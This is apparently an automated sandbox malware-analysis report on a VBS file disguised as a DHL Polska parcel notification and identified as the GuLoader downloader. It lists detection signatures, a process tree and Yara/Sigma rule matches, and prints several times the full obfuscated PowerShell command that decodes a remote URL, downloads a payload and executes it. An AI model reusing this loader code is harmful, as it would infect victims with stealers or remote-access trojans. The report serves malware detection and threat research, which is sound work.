Windows Analysis Report
DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs

Overview

General Information

Sample name: DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs
(renamed because original name is a hash value)
Original sample name: DHL Polska_Powiadomienie oprzesyce 28036893335.vbs
Analysis ID: 1466655
MD5: 3b5b96bb9765b0c37f926296a205a2d6
SHA1: 30ba62c4b319c4950bf70b83634bc8108c50c6da
SHA256: 31a8c9d6f61346b95e41ee64547aa6160932a0f740f4a712c26b6b7f1015a588
Tags: DHL, vbs

Detection

GuLoader
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7284 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 8096 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padleaare=Trosfllen 'Lu$A,Abint,ipasspeGni PkTeom,nq.iUnc,r.FoDNooCuwStnIml.ao,aa,wdKaF iU l ie .( .$ AlS.oUnv .rT.e egCll,ae OnBesBu,Ta$TuW .i .n ,dCaoI.wSustrhDeoB.p.op iKonEpgPr)Ko ';$Windowshopping=$bigthatch[0];Extensionalism (Trosfllen 'S $Cog AlFuo.obTaaP.lEn: yG nyAtm ,n aa fs.tt ke .rFonAfe,tsH,= O( RTA eGasHotNo-A.PV,aArt ,hOc o$FoWH.iS,nGadMeo SwPrsSvhTeo,ppExpU.iSlnOpgOm)Ac ');while (!$Gymnasternes) {Extensionalism (Trosfllen ' n$ hgT lbooSub,uaJolFl:PeS SkMeo ,l ieLes ,kO,eCamSuaVasIn= U$OutfirBluPreCa ') ;Extensionalism $Padleaare;Extensionalism (Trosfllen '.aS Tt.haStrDit.a-AdSUnl HeEke,lplk Ki4 H ');Extensionalism (Trosfllen 'E,$OvgT l aoS.b PaPolKo:siGAny mD,nTaaLysR,t ae r NnS,eShsRi=.e(M TExeStsU.tI,-AnPMaa ntCahNo go$PaWR,irenS.dDeoaswSvs AhProR,p ip.ii InHegBe)T ') ;Extensionalism (Trosfllen 'W,$T,g .lM,oChbfoa.alT :K.O tr trehgloFldFriCoa gBer aPrpO,hS.y o2Ru1 .7Fo= l$ ,g,yl MoDebPra SlT,:C HP eOvm TilitDeeJar uaNdtGaiDrcJ,+Pa+Be%Re$.iMHyaPolYmlMaef.o nlR a SrTr.Rac ,oHuuOtnBetEn ') ;$lovreglens=$Malleolar[$Orthodiagraphy217];}$Firetogs123=301889;$Stjrthagerne=26396;Extensionalism (Trosfllen 'P $AcgSllTio.nbGta rl,o:EnNVaoM n.esVkcE aV lBaaSerRe G.=Mi BG.ceIntSc-S.CA oS.nPrtCae CnAnt U Pa$NaW.oi,lnNudB oApwIns,nh Fo Jp Bp PiS,nReg.a ');Extensionalism (Trosfllen ',r$HogSnlOboWabBuaHelS,:DiG.uaTrl GlB u .paat,aaD.lSel Ae en SeSns n2 p9La D.=R A[ oSReyTisfrt ieCom .L.CDeo.onF.vnie.nrOvtG,]Be: D: TF Dr MoNom LBA,a osBue E6Mn4,eSS t .rH iRonB g (a $ ,N,yoRanTesPecPoaOrlCha srTr)Ly ');Extensionalism (Trosfllen 'Oc$Prg ,lAloP.b.iaFel V:P AS.bN.eRitHo2Un2 .6Ut F.=Th St[KoS ByC,sCatUne m .roTBle.hxDet K.PrEa.nSkcApoFedS iP.nlig .] r: A:FoA.rSSkCBeIC,IT,.jaG ReR,tInS Otter FiMenArgS (,e$ KGDiaKol.olFsuInpF t NaF l.gl le ,nB.eklsN,2 S9Ci).n ');Extensionalism (Trosfllen 'Li$,sgKol,eodobUla ,l.f:,aUHnnIns Ww FeErlg,tNoe vr.diStnCig,a=A $unA MbO e.pt.l2 a2Op6,i.AfsPauArb Ns MtKorKoiUdnRegBe(Pe$AiFUniDir de ,tS o,ng,asR.1Ko2Gr3Fe, T$CoSP,t BjDerF,t,lhA,aKag ae Lr.rnTie S)Cr ');Extensionalism $Unsweltering;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7204 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Democratising.Spi && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6160 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padleaare=Trosfllen 'Lu$A,Abint,ipasspeGni PkTeom,nq.iUnc,r.FoDNooCuwStnIml.ao,aa,wdKaF iU l ie .( .$ AlS.oUnv .rT.e egCll,ae OnBesBu,Ta$TuW .i .n ,dCaoI.wSustrhDeoB.p.op iKonEpgPr)Ko ';$Windowshopping=$bigthatch[0];Extensionalism (Trosfllen 'S $Cog AlFuo.obTaaP.lEn: yG nyAtm ,n aa fs.tt ke .rFonAfe,tsH,= O( RTA eGasHotNo-A.PV,aArt ,hOc o$FoWH.iS,nGadMeo SwPrsSvhTeo,ppExpU.iSlnOpgOm)Ac ');while (!$Gymnasternes) {Extensionalism (Trosfllen ' n$ hgT lbooSub,uaJolFl:PeS SkMeo ,l ieLes ,kO,eCamSuaVasIn= U$OutfirBluPreCa ') ;Extensionalism $Padleaare;Extensionalism (Trosfllen '.aS Tt.haStrDit.a-AdSUnl HeEke,lplk Ki4 H ');Extensionalism (Trosfllen 'E,$OvgT l aoS.b PaPolKo:siGAny mD,nTaaLysR,t ae r NnS,eShsRi=.e(M TExeStsU.tI,-AnPMaa ntCahNo go$PaWR,irenS.dDeoaswSvs AhProR,p ip.ii InHegBe)T ') ;Extensionalism (Trosfllen 'W,$T,g .lM,oChbfoa.alT :K.O tr trehgloFldFriCoa gBer aPrpO,hS.y o2Ru1 .7Fo= l$ ,g,yl MoDebPra SlT,:C HP eOvm TilitDeeJar uaNdtGaiDrcJ,+Pa+Be%Re$.iMHyaPolYmlMaef.o nlR a SrTr.Rac ,oHuuOtnBetEn ') ;$lovreglens=$Malleolar[$Orthodiagraphy217];}$Firetogs123=301889;$Stjrthagerne=26396;Extensionalism (Trosfllen 'P $AcgSllTio.nbGta rl,o:EnNVaoM n.esVkcE aV lBaaSerRe G.=Mi BG.ceIntSc-S.CA oS.nPrtCae CnAnt U Pa$NaW.oi,lnNudB oApwIns,nh Fo Jp Bp PiS,nReg.a ');Extensionalism (Trosfllen ',r$HogSnlOboWabBuaHelS,:DiG.uaTrl GlB u .paat,aaD.lSel Ae en SeSns n2 p9La D.=R A[ oSReyTisfrt ieCom .L.CDeo.onF.vnie.nrOvtG,]Be: D: TF Dr MoNom LBA,a osBue E6Mn4,eSS t .rH iRonB g (a $ ,N,yoRanTesPecPoaOrlCha srTr)Ly ');Extensionalism (Trosfllen 'Oc$Prg ,lAloP.b.iaFel V:P AS.bN.eRitHo2Un2 .6Ut F.=Th St[KoS ByC,sCatUne m .roTBle.hxDet K.PrEa.nSkcApoFedS iP.nlig .] r: A:FoA.rSSkCBeIC,IT,.jaG ReR,tInS Otter FiMenArgS (,e$ KGDiaKol.olFsuInpF t NaF l.gl le ,nB.eklsN,2 S9Ci).n ');Extensionalism (Trosfllen 'Li$,sgKol,eodobUla ,l.f:,aUHnnIns Ww FeErlg,tNoe vr.diStnCig,a=A $unA MbO e.pt.l2 a2Op6,i.AfsPauArb Ns MtKorKoiUdnRegBe(Pe$AiFUniDir de ,tS o,ng,asR.1Ko2Gr3Fe, T$CoSP,t BjDerF,t,lhA,aKag ae Lr.rnTie S)Cr ');Extensionalism $Unsweltering;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 3704 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Democratising.Spi && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
Source: 00000009.00000002.2973558788.000000000607A000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_GuLoader_5 | Description: Yara detected GuLoader | Author: Joe Security
Source: 00000005.00000002.3010170859.000001D066B48000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_GuLoader_5 | Description: Yara detected GuLoader | Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 8096 | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 8096 | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen | Strings:
        • 0x18aac2:$b2: ::FromBase64String(
        • 0x18ab02:$b2: ::FromBase64String(
        • 0x18ab43:$b2: ::FromBase64String(
        • 0x18ab85:$b2: ::FromBase64String(
        • 0x18abc8:$b2: ::FromBase64String(
        • 0x18ac0c:$b2: ::FromBase64String(
        • 0x18ac51:$b2: ::FromBase64String(
        • 0x18ac97:$b2: ::FromBase64String(
        • 0x18acde:$b2: ::FromBase64String(
        • 0x18ad26:$b2: ::FromBase64String(
        • 0x18ad6f:$b2: ::FromBase64String(
        • 0x18adb9:$b2: ::FromBase64String(
        • 0x1b4fd3:$b2: ::FromBase64String(
        • 0x54819:$s1: -join
        • 0x549d6:$s1: -join
        • 0x8a391:$s1: -join
        • 0x8aaf1:$s1: -join
        • 0xc60c0:$s1: -join
        • 0x112f89:$s1: -join
        • 0x117de7:$s1: -join
        • 0x1c0cd6:$s1: -join
Source: Process Memory Space: powershell.exe PID: 6160 | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security

Source | Rule | Description | Author | Strings
Source: amsi64_8096.amsi.csv | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: amsi32_6160.amsi.csv | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen | Strings:
            • 0xdce8:$b2: ::FromBase64String(
            • 0xcd5a:$s1: -join
            • 0x6506:$s4: +=
            • 0x65c8:$s4: +=
            • 0xa7ef:$s4: +=
            • 0xc90c:$s4: +=
            • 0xcbf6:$s4: +=
            • 0xcd3c:$s4: +=
            • 0x15dda:$s4: +=
            • 0x15e5a:$s4: +=
            • 0x15f20:$s4: +=
            • 0x15fa0:$s4: +=
            • 0x16176:$s4: +=
            • 0x161fa:$s4: +=
            • 0xd585:$e4: Get-WmiObject
            • 0xd774:$e4: Get-Process
            • 0xd7cc:$e4: Start-Process
            • 0x16a96:$e4: Get-Process

            System Summary

            Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs", CommandLine|base64offset|contains: >lvzx, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs", ProcessId: 7284, ProcessName: wscript.exe
            Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padleaare=Trosfllen 'Lu$A,Abint,ipasspeGni PkTeom,nq.iUnc,r.FoDNo
            Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs", CommandLine|base64offset|contains: >lvzx, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs", ProcessId: 7284, ProcessName: wscript.exe
            Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , 